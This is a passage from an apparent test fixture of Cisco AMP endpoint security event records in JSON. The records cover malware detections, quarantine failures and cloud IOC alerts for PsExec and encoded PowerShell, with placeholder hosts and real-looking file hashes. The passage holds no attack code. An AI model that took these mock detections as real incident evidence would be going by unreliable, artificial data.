Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":460392585524661250,"timestamp":1610618215,"timestamp_nanoseconds":615000000,"date":"2021-01-14T09:56:55+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618215,"start_date":"2021-01-14T09:56:55+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The psexec utility was executed as admin.","short_description":"W32.PsexecAsAdmin.ioc"},"file":{"disposition":"Clean","file_name":"PsExec.exe","file_path":"file:///C%3A/share%24/PsExec.exe","identity":{"sha256":"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef"},"parent":{"disposition":"Clean","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610611000,"timestamp_nanoseconds":758406329,"date":"2021-01-14T07:56:40+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136035192884000,"timestamp":1610603346,"timestamp_nanoseconds":403000000,"date":"2021-01-14T05:49:06+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610603346,"start_date":"2021-01-14T05:49:06+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"},"parent":{"disposition":"Clean","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515350231459808800,"timestamp":1610584664,"timestamp_nanoseconds":0,"date":"2021-01-14T00:37:44+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610584030,"timestamp_nanoseconds":579890366,"date":"2021-01-14T00:27:10+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583671182384431000,"timestamp":1610582528,"timestamp_nanoseconds":614000000,"date":"2021-01-14T00:02:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":695000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":691000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":684000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":682000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective 